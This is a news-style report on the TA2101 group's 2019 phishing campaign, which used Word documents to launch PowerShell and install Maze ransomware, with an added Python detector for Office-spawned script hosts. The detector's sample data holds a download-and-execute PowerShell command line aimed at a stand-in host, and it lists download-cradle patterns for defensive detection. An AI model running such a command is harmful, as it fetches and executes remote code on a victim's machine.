Usually, these tools are used by companies to identify vulnerabilities and protect their systems. However, other hacking groups, such as Cobalt Group, APT32 and APT19, have also been seen using them to develop malware.
The researchers also discovered that the new hacking group TA2101 used the Maze ransomware, together with its social engineering technique, to attack an Italian company.
Exploit Windows via malicious Word documents
The attacks by the TA2101 group were discovered by Proofpoint researchers. The malicious campaign took place between 16 October and 12 November 2019. The hackers sent malicious emails to companies in Germany, Italy and the United States. Their main targets were IT services, construction companies and healthcare organizations.
According to researchers, most emails contained malicious Word documents.
The message urged victims to open the malicious attachment. If users opened the document and enabled its content, it ran a PowerShell script.
The PowerShell script, in turn, downloaded and installed the Maze ransomware on the victim's device.
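The Word-document-to-PowerShell chain described above leaves a recognisable trace in endpoint process-creation telemetry: an Office application spawning a script host, often with download-and-execute style arguments. The following is an added example, not code from Proofpoint or from the article, that scans constructed, simplified process-creation records (the field names, hosts and sample command lines are assumptions) for exactly that pattern:

```python
import re

# Constructed, simplified process-creation records (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage')\""},
    {"host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "ws03",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line traits commonly seen in download-and-execute stagers.
CRADLE_ARGS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
                         r"bitsadmin|-enc|-w hidden|windowstyle hidden", re.I)

def basename(path):
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the list of reasons an event looks like an Office-launched stager."""
    reasons = []
    parent, child = basename(ev["parent"]), basename(ev["image"])
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"office-parent:{parent}->{child}")
    if CRADLE_ARGS.search(ev.get("cmdline", "")):
        reasons.append("download-cradle-args")
    return reasons

def find_suspicious(events):
    """Return (host, severity) for events where an Office app spawned a script host.
    'high' when the child also carries download/hidden-window arguments, else 'medium'."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if not any(r.startswith("office-parent") for r in reasons):
            continue
        severity = "high" if "download-cradle-args" in reasons else "medium"
        hits.append((ev["host"], severity))
    return hits

if __name__ == "__main__":
    for host, severity in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: {severity}")
```

The "medium" tier exists because a legitimate macro can launch cmd.exe; the parent-child pair alone is worth a look, but the combination with hidden-window and download arguments is what matches the chain in this campaign.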
The hackers sent different emails to the victims. In some of them, the sender appeared to be the German Federal Ministry of Finance. The victims were told to open the malicious document to find information on how to avoid further taxation and penalties.
Recently, Proofpoint researchers found another email campaign containing malicious Word documents that infected victims' systems with the IcedID banking Trojan.
In that campaign too, the malicious document led to the installation of the IcedID malware payload on corporate systems. The main target of the campaign was healthcare organizations. The system infection process was the same as in the recent TA2101 campaign.
The techniques used by this hacking group are very sophisticated and show that the hackers are very experienced and prepared for many more attacks.